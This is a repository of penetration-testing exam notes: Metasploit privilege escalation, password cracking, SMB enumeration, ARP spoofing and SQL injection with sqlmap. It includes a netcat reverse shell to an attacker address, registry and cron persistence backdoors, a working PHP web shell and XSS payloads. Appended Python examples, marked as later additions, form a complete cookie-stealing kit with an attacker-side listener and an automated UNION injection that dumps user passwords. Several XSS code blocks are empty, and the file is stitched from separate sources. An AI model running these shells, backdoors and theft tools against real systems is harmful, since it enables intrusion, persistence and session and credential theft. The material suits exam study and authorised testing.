├── .gitattributes
├── README.md
├── mySQLcommands.md
├── metasploit and meterpreter.md
├── passwordCracking.md
├── backDoorTools.md
├── eCPPT Tools.md
├── eJPT-Tools.md
└── WebAttacks.md

/.gitattributes:
--------------------------------------------------------------------------------
# Auto detect text files and perform LF normalization
* text=auto
--------------------------------------------------------------------------------

/README.md:
--------------------------------------------------------------------------------
# eJPT Exam Tools

### By Daniel Arlington

This is a collection of tools and commands to use during the eJPT exam.
--------------------------------------------------------------------------------

/mySQLcommands.md:
--------------------------------------------------------------------------------
# MySQL Basic Commands

[MySQL Cheat Sheet](https://gist.github.com/hofmannsven/9164408)

[MySQL Basic Commands](http://g2pc1.bu.edu/~qzpeng/manual/MySQL%20Commands.htm)
--------------------------------------------------------------------------------

/metasploit and meterpreter.md:
--------------------------------------------------------------------------------
# Metasploit and Meterpreter Tips

Before starting Metasploit, start the PostgreSQL database that msfconsole stores hosts, services and loot in:

```
$ service postgresql start
```


## Metasploit

Commands (typed in msfconsole)
* search -h (shows the search filters, e.g. type:, platform:, cve:)

Host discovery and port scanning modules (load with `use` and set RHOSTS)
* arp_sweep (auxiliary/scanner/discovery/arp_sweep, finds live hosts on the local segment)
* portscan (auxiliary/scanner/portscan/tcp)


## Meterpreter

Commands (they are lowercase and case-sensitive)
* help or ?
* background (send the session to the background and return to msfconsole)
* sessions -i 1 (interact with session ID 1)
* sysinfo
* getpid (get the PID of the process the session lives in)
* download FILENAME /root/
* getsystem (try the built-in privilege escalation techniques to become SYSTEM)
* run post/windows/gather/win_privs (check the current user's privileges)
* bypassuac is not a Meterpreter command: background the session and `use exploit/windows/local/bypassuac` when getsystem fails because of UAC
* ps -U SYSTEM (list processes run as SYSTEM)

Try to migrate to a different process: pick a stable, long-lived SYSTEM process (e.g. from the `ps -U SYSTEM` output) so the session survives if the original process dies.

* migrate NEWPID (migrates to the new PID)



--------------------------------------------------------------------------------

/passwordCracking.md:
--------------------------------------------------------------------------------
# Password Cracking Tools

## John The Ripper

Used to crack the local account hashes held in

* /etc/passwd
* /etc/shadow

First merge the two files with unshadow (reading /etc/shadow needs root); the output file is what john is pointed at afterwards, so the names must match:
```
$ unshadow passwd shadow > hashes.file
```

```
$ john --wordlist=/usr/share/john/password.lst hashes.file
```

Cracked passwords are cached in john's pot file; print them again with `john --show hashes.file`.

## Rainbow Tables / Ophcrack


## Hashcat

Hashcat switches

* -m Hash mode/type (e.g. 0 = MD5, 100 = SHA1, 1000 = NTLM, 1800 = sha512crypt; `hashcat --help` lists them)
* -a Attack mode (0 = wordlist, 3 = brute-force/mask)
* -o Write cracked hashes to a file
* -b Run a benchmark
* -d Specify the device (GPU/CPU) to use
* -O Use optimized kernels (faster, but limits the maximum password length)


## Hydra

Hydra module information (`-U` prints the usage/help of a module, which shows the form syntax for the http modules)

```
$ hydra -U rdp
$ hydra -U http-get
$ hydra -U http-form-post
```

--------------------------------------------------------------------------------

/backDoorTools.md:
--------------------------------------------------------------------------------
# Backdoor tools

## Netcat, ncat, nc

Ncat switches

* -l Listen for an incoming connection
* -e, --exec Execute the given program once connected (e.g. /bin/bash, cmd.exe); some nc builds ship without this switch
* -p Port (for a listener, the port to listen on; when connecting, -p sets the *source* port, the destination port is a positional argument)
* -v Verbose
* -n Do not resolve hostnames via DNS (numeric addresses only)

Reverse shell: start the listener on the attacker first, then make the victim connect back and hand over a shell.

Attacker computer
```
$ ncat -lnvp 1234
```

Victim computer (ATTACKER_IP is the listener's address)
```
$ ncat -nv ATTACKER_IP 1234 -e /bin/bash
```


## Install Persistent Backdoor

Windows Registry (programs listed under the Run key start at every logon; the HKEY_CURRENT_USER equivalent needs no administrator rights)

```
Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Add a string value whose data is the path of the backdoor executable
```

Linux Cron

```
Add the command to the crontab (crontab -e); a root crontab or an /etc/cron.d entry survives reboots
```

--------------------------------------------

## Exfiltration Techniques and Tools

* PacketWhisper.py (exfiltration over DNS queries)
* Netcat file redirection (pipe the file into a netcat connection on the sender, redirect the listener's output to a file on the receiver)
* scp (secure copy over SSH)
* http.server (Python's built-in HTTP server module, `python3 -m http.server`; SimpleHTTPServer on Python 2) to serve or fetch files over HTTP

--------------------------------------------------------------------------------

/eCPPT Tools.md:
--------------------------------------------------------------------------------
## eCPPT Tools


SSRF Example

```
In this example, the attacker can control the server's subdomain to which the request is made. Note the payload ending in &x=, which stops the remaining path from being appended to the end of the attacker's URL and instead turns it into a parameter (?x=) on the query string. Next
```

XSS Example

```
```

Cookie stealing
```
```

Closing the input tag
```
The important part of the payload is the "> which closes the value attribute and then closes the input tag, so whatever follows is parsed as new HTML.
```

Polyglots (one payload that executes in several different contexts: inside a string, an attribute, a comment or plain HTML)

```
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */onerror=alert('THM') )//%0D%0A%0d%0a//\x3csVg/\x3e
```

Fetch Cookie using Javascript

```
```



# Post Exploitation Linux

* 3snake (dumps passwords from sshd and sudo processes via ptrace)
* Bettercap (network MITM and sniffing framework)


--------------------------------------------------------------------------------

/eJPT-Tools.md:
--------------------------------------------------------------------------------
# eJPT Tools
My list of tools for the eJPT exam.

## List of Well-known Ports

* SSH (22)
* SMTP (25)
* POP3 (110)
* IMAP (143)
* HTTP/S (80, 443)
* NetBIOS/SMB: 137/udp (name service: enumerate workgroups and hostnames), 138/udp (datagram service: browse shares and machines), 139/tcp (NetBIOS session service, SMB over NetBIOS) and 445/tcp (SMB directly over TCP: file transfer, RPC, etc.)
* SFTP (115; this is the old Simple File Transfer Protocol, not SSH-based SFTP, which runs over SSH on port 22)
* Telnet (23)
* FTP (21 control channel, 20 data channel)
* RDP (3389)
* MySQL (3306)
* MS SQL Server (1433)


## Common Tools/Commands

* netstat -tunp (TCP and UDP sockets, numeric addresses, owning process)
* ARP checks
  - arp -a
  - ip neighbour
  - arpspoof (poisons both hosts' ARP caches so their traffic passes through tap0; enable IP forwarding on the attacker first, otherwise the two hosts lose connectivity and the attack is noticed)
```
$ arpspoof -i tap0 -t SERVERADDRESS -r CLIENTADDRESS
```
* nslookup
* whois
* sublist3r -d [domain] (subdomain enumeration)


## Network Scanning Tools

1. fping -a -g [IPRANGE] 2>/dev/null > output.txt (ping a whole range, keep only the hosts that answered)

2. Nmap
   * -sn (ping scan: host discovery only, no port scan)
   * -sT (TCP connect scan: full handshake, works without root)
   * -sS (SYN scan: half-open, often called "stealth", requires root)
   * -iL [fileList] (read targets from a file, e.g. the fping output)
   * -Pn (treat all hosts as online, skip host discovery; use when ICMP is filtered)
   * -O (OS detection)
   * -sV (service version detection)

## Vulnerability Scanning Tools

3. Nessus

4. OpenVAS

## Web Application Scanning Tools

5. BurpSuite
   * java -jar [BurpsuiteOlderVersions.jar]

6. ZAP
   * Use as a spidering tool


## Windows SMB Scanning

7. enum4linux

Important switches

* -a Run all simple enumeration (equivalent to -U -S -G -P -r -o -n -i)
* -n Do an nmblookup (NetBIOS name lookup)
* -U Enumerate the user list
* -P Enumerate the password policy
* -S Enumerate the share list
* -s Share name brute force with a word list
```
$ enum4linux -s /usr/share/enum4linux/share-list.txt IPADDRESS
```

8. Impacket tools - samrdump (lists users and shares over MSRPC/SAMR)

9. smbclient

```
$ smbclient -L //IPADDRESS/ -N (list shares, null session: no password)
$ smbclient -L WORKGROUP -I IPADDRESS -N -U "" (list shares, empty user and password)
$ smbclient \\\\IPADDRESS\\SHARE -N (connect to a share interactively)
```

10. Nmap SMB scripts (NSE; add -p 139,445 to limit the scan to the SMB ports)

```
$ nmap --script=smb-enum-shares IPADDRESS
$ nmap --script=smb-enum-users IPADDRESS
$ nmap --script=smb-enum* IPADDRESS (wildcard: runs every smb-enum-* script)
$ nmap --script=smb-brute IPADDRESS (password guessing: noisy and may lock accounts out)
```
--------------------------------------------------------------------------------

/WebAttacks.md:
--------------------------------------------------------------------------------
# Web Application Tools
My list of Web Application tools for the eJPT exam.

-------------------------------------

## *HTTP Protocol and Fingerprinting*

1. Netcat (talk raw HTTP by hand)
   * nc [targetAddress] 80

2. OpenSSL (the same, over TLS)
   * openssl s_client -connect [targetAddress:443]

3. httprint (web server fingerprinting by response signature)
   * httprint -P0 -h [targetAddress] -s /usr/share/httprint/signatures.txt

-------------------------------------

## *HTTP Verbs - Use in Burpsuite*

### (Can be used on misconfigured web servers)

- GET - Request a resource
- HEAD - Request only the response headers
- POST - Submit form data (e.g. username, password)
- PUT - Create an arbitrary file on the server (when enabled, this is how a web shell gets uploaded)
- DELETE - Remove a file from the server
- OPTIONS - Ask which methods the server allows (returned in the Allow: header); check this first to see whether PUT or DELETE are exposed

"GET" Example:

```
GET /page.php?command=pwd HTTP/1.1
Host: www.host.com

```


"POST" Example (the body follows an empty line; the Content-Type header is what makes PHP populate $_POST, and Content-Length is the body size in bytes):

```
POST /login.php HTTP/1.1
Host: www.host.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

username=admin&password=1234
```


"DELETE" Example:

```
DELETE /wp-content/imp.file HTTP/1.1
Host: www.host.com

```

"PUT" Example (Content-Length is the file size in bytes, so use `wc -c`; `wc -m` counts characters, which differs for non-ASCII files; the blank line after the headers is mandatory, then paste the file contents):

```
$ wc -c payload.php
20 payload.php

$ nc [targetAddress] 80
PUT /payload.php HTTP/1.0
Content-type: text/html
Content-length: 20

```

Afterwards request /payload.php with GET to confirm the upload worked.

-------------------------------------

## *Dirbuster (GUI) / Gobuster / Dirb*

* Search for interesting file types
  * php
  * txt
  * bak
  * old

```
$ gobuster dir --url http://host.com/ -w /path/to/word.list -x php,txt,old,bak -o output.txt

$ dirb http://host.com/ /path/to/word.list -X .php,.txt,.bak,.old -o output.txt

$ dirb https://host.com/ (simple SSL test)
```

(gobuster's -x adds the dot itself; dirb's -X appends the string literally, so the extensions need the leading dot.)

*Tip: search for **signup pages** and **old configuration files**.*

-------------------------------------

## Cross-Site Scripting

* Session cookies
  * document.cookie - the JavaScript property that holds the page's cookies (cookies flagged HttpOnly are not visible here)

*Display cookie as an alert*
```
```
*Victim's Browser* <--- **Inject this piece of code!**
```
```

*Attacker's Computer*
```
```
*Alternate code*

```
```
-------------------------------------
## SQL-Injection

*Tip: look at the page source for identifiers that are passed to the backend, e.g. src="images/els1" (the name may be a database key used in a query)!*
* SQL statements

```
SELECT * FROM table WHERE condition;
```

Putting comments in statements (used to discard the rest of the original query, such as a closing quote)
```
# Hash symbol (MySQL only)
-- Double hyphens followed by a whitespace (add a space and another hyphen, "-- -", so the trailing space is not lost in the URL)

SELECT * FROM table; # Comment
SELECT * FROM table; -- Another comment
```

* Boolean attacks (the injected `' OR '1'='1'` makes the WHERE clause always true; the comment swallows the application's closing quote)

```
SELECT * FROM items WHERE id='' OR '1' = '1'; -- -'
```

* Union attacks (the UNION must have the same number of columns as the original SELECT; add NULLs until the error disappears, then replace them with column names from another table)

```
SELECT * FROM items WHERE id='' UNION SELECT null, null, null; -- -'
```

## SQLmap switches

```
Example:

$ sqlmap -u "http://10.10.10.10/get.php?id=1234" -p id --technique=U

$ sqlmap -u "http://10.10.10.10/login.php" --data "username=admin&password=1234" -p username --technique=B --banner
```

* -u URL
* -p Parameter to test
* --data Data to send in a POST request (username=admin&password=1234)
* --technique Injection techniques to use (B = boolean-based blind, U = UNION query, E = error-based, T = time-based blind, S = stacked queries)
* --banner Retrieve the DBMS banner
* --users Enumerate DBMS users
* --passwords Enumerate the DBMS users' password hashes
* --dbs Enumerate DBMS databases
* -D Database to enumerate (insert the database name found)
* --tables Enumerate the tables of the given database
* -T Table to enumerate (e.g. Users, Accounts, etc.)
* --columns Enumerate table columns
* -C Columns to enumerate (e.g. -C username,password)
* --dump Dump all entries of the table
* -r Load the HTTP request from a file (save the request from Burpsuite)
* --flush-session Flush the session files for the current target and start the detection again


-------------------------------------

## *Reverse Shell Links*

[Pentest Monkey Website](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet)

[GTFOBins Website](https://gtfobins.github.io/)


Example PHP web shell (not a reverse shell: it runs the command passed in the `cmd` request parameter and returns the output; use it to launch one of the reverse shells linked above):

```php
<?php
// Minimal PHP web shell: the opening lines and the <pre> tags were lost when
// this page was extracted and are restored here from the remaining lines.
if (isset($_REQUEST['cmd'])) {
    echo '<pre>';
    $cmd = $_REQUEST['cmd'];
    $result = shell_exec($cmd);
    echo $result;
    echo '</pre>';
}
?>
```

--------------------------------------------------------------------------------
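Added example for the passwordCracking.md notes (not code from the original repo): what `unshadow` actually does to the two files, and the wordlist attack that `john --wordlist` / `hashcat -a 0` then run, on constructed sample data. The passwd/shadow lines, the hashes and the wordlist below are made up; hashlib is used so it runs anywhere, which limits it to the unsalted hashcat modes 0, 100 and 1400 (real /etc/shadow entries are sha512crypt, `$6$`, which john and hashcat handle natively).

```python
"""Added example: unshadow merge and a dictionary attack in pure Python."""
import hashlib

# Constructed sample files (not real accounts or hashes).
PASSWD = """root:x:0:0:root:/root:/bin/bash
alice:x:1000:1000:Alice:/home/alice:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
"""
SHADOW = """root:$6$saltsalt$fakehash:19000:0:99999:7:::
alice:$6$othersalt$otherfakehash:19000:0:99999:7:::
daemon:*:19000:0:99999:7:::
"""
WORDLIST = ["letmein", "password", "123456", "qwerty"]  # constructed password.lst


def unshadow(passwd_text, shadow_text):
    """Merge passwd and shadow by username: the 'x' placeholder in passwd's
    second field is replaced by the hash from shadow (the format john expects)."""
    hashes = {}
    for line in shadow_text.splitlines():
        if line.strip():
            fields = line.split(":")
            hashes[fields[0]] = fields[1]
    merged = []
    for line in passwd_text.splitlines():
        if not line.strip():
            continue
        fields = line.split(":")
        fields[1] = hashes.get(fields[0], fields[1])
        merged.append(":".join(fields))
    return merged


def crackable(unshadowed):
    """Drop locked/disabled accounts ('*' or '!' in the hash field), as john does."""
    return [l for l in unshadowed if not l.split(":")[1].startswith(("*", "!"))]


# hashcat -m values for the unsalted hashes hashlib can compute
HASHCAT_MODES = {0: "md5", 100: "sha1", 1400: "sha256"}


def dictionary_attack(hashes, wordlist, mode):
    """Hash every candidate and compare against the targets (hashcat -a 0).
    Returns {hash: plaintext} for every hash that was recovered."""
    algo = HASHCAT_MODES[mode]
    targets = {h.lower() for h in hashes}
    found = {}
    for word in wordlist:
        digest = hashlib.new(algo, word.encode()).hexdigest()
        if digest in targets:
            found[digest] = word
    return found


if __name__ == "__main__":
    for line in crackable(unshadow(PASSWD, SHADOW)):
        print(line)
    # md5("password"), as a sample -m 0 target
    print(dictionary_attack(["5f4dcc3b5aa765d61d8327deb882cf99"], WORDLIST, 0))
```

The merge keeps the passwd fields (UID, GID, shell) so john can report which account each cracked hash belongs to; accounts whose hash field is `*` or `!` have no password and are skipped rather than wasting cracking time.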
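Added example for the Cross-Site Scripting section (the XSS snippets on the original page did not survive extraction; this is not that code): both halves of cookie theft through XSS. `build_payloads()` produces the script injected into the victim's page, including the `">` breakout from the eCPPT notes, and `CookieCatcher` is the attacker-side listener that records `document.cookie` as it arrives. The vulnerable and fixed `reflect_*` sinks show why the injection works and what stops it. The attacker URL `http://10.10.10.10:8000/c` is an assumption for illustration.

```python
"""Added example: XSS cookie exfiltration payloads and the attacker's catcher."""
import html
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlparse, parse_qs

ATTACKER_URL = "http://10.10.10.10:8000/c"  # assumed attacker listener


def build_payloads(attacker_url=ATTACKER_URL):
    """Common injection forms. Each sends document.cookie to attacker_url as the
    'c' query parameter; encodeURIComponent keeps ';' and '=' intact."""
    js = f'new Image().src="{attacker_url}?c="+encodeURIComponent(document.cookie)'
    return {
        # plain script tag, for a sink that reflects raw HTML
        "script": f"<script>{js}</script>",
        # closes value="..." and the <input> tag first (the "> trick)
        "break_out_of_input": f'"><script>{js}</script>',
        # no <script> tag needed: event handler on a broken image
        "img_onerror": f"<img src=x onerror='{js}'>",
    }


def extract_cookie(request_path):
    """Parse the exfil request path (/c?c=...) and return the stolen cookie."""
    qs = parse_qs(urlparse(request_path).query)
    return qs.get("c", [""])[0]


STOLEN = []  # (client ip, cookie string) pairs received by the listener


class CookieCatcher(BaseHTTPRequestHandler):
    def do_GET(self):
        cookie = extract_cookie(self.path)
        if cookie:
            STOLEN.append((self.client_address[0], cookie))
        self.send_response(200)          # empty 200 so the victim page sees nothing odd
        self.send_header("Content-Length", "0")
        self.end_headers()

    def log_message(self, *args):        # keep the console quiet
        pass


def serve(port=8000):
    """Start the catcher in a background thread; returns the server object."""
    srv = HTTPServer(("0.0.0.0", port), CookieCatcher)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def reflect_unsafely(user_input):
    """Vulnerable sink: echoes the input into an attribute unescaped."""
    return f'<input type="text" name="q" value="{user_input}">'


def reflect_safely(user_input):
    """Fixed sink: HTML-escapes the value, so the "> breakout stays inside the attribute."""
    return f'<input type="text" name="q" value="{html.escape(user_input, quote=True)}">'


if __name__ == "__main__":
    for name, p in build_payloads().items():
        print(name, "->", reflect_unsafely(p))
    print("escaped ->", reflect_safely(build_payloads()["break_out_of_input"]))
    print("stolen ->", extract_cookie("/c?c=PHPSESSID%3Dabc123"))
```

Run `serve()` on the attacker box and inject one of the payloads into the vulnerable page; each victim that loads it shows up in `STOLEN`. Cookies flagged HttpOnly never appear, because `document.cookie` cannot read them.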
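Added example for the SQL-Injection section (not code from the original page): the boolean and UNION payloads from the notes run against a constructed SQLite `items` table through a deliberately vulnerable lookup, next to the parameterised version that defeats them. It goes one step past the notes by automating the column-count discovery and then using the UNION to read another table. SQLite accepts the `-- -` comment used in the notes, but the `#` comment is MySQL-only, which the last function demonstrates.

```python
"""Added example: boolean and UNION SQL injection against an in-memory SQLite DB."""
import sqlite3


def make_db():
    """Constructed sample schema: items (the ids the page tip mentions) and users."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE items(id TEXT, name TEXT, price INTEGER);
        INSERT INTO items VALUES ('els1','elephant',10),('els2','giraffe',20),('els3','zebra',30);
        CREATE TABLE users(username TEXT, password TEXT, role TEXT);
        INSERT INTO users VALUES ('admin','S3cret!','admin'),('bob','hunter2','user');
    """)
    return db


def lookup_vulnerable(db, item_id):
    """String concatenation: the parameter becomes part of the SQL text."""
    sql = "SELECT * FROM items WHERE id='" + item_id + "'"
    return db.execute(sql).fetchall()


def lookup_safe(db, item_id):
    """Parameter binding: the value can never change the statement's structure."""
    return db.execute("SELECT * FROM items WHERE id=?", (item_id,)).fetchall()


# The boolean payload from the notes; "-- -" comments out the application's closing quote.
BOOLEAN_PAYLOAD = "' OR '1'='1' -- -"


def find_column_count(db, max_cols=10):
    """UNION technique step 1: add NULLs until the query stops erroring."""
    for n in range(1, max_cols + 1):
        payload = "' UNION SELECT " + ",".join(["null"] * n) + " -- -"
        try:
            lookup_vulnerable(db, payload)
            return n
        except sqlite3.OperationalError:   # "SELECTs ... do not have the same number of result columns"
            continue
    return None


def dump_users(db):
    """UNION technique step 2: replace the NULLs with columns from another table,
    padding or truncating to the column count found above."""
    n = find_column_count(db)
    cols = (["username", "password", "role"] + ["null"] * n)[:n]
    payload = "' UNION SELECT " + ",".join(cols) + " FROM users -- -"
    return lookup_vulnerable(db, payload)


def hash_comment_fails(db):
    """True if the MySQL-style '#' comment is rejected by this DBMS (it is by SQLite)."""
    try:
        lookup_vulnerable(db, "' OR '1'='1' #")
        return False
    except sqlite3.OperationalError:
        return True


if __name__ == "__main__":
    db = make_db()
    print("boolean, vulnerable:", lookup_vulnerable(db, BOOLEAN_PAYLOAD))
    print("boolean, safe:", lookup_safe(db, BOOLEAN_PAYLOAD))
    print("columns:", find_column_count(db))
    print("users:", dump_users(db))
    print("'#' comment rejected:", hash_comment_fails(db))
```

The parameterised lookup returns nothing for the payload because the whole string is compared against `id` as data; the vulnerable one returns every row, which is exactly the difference sqlmap's boolean-based (`--technique=B`) detection looks for.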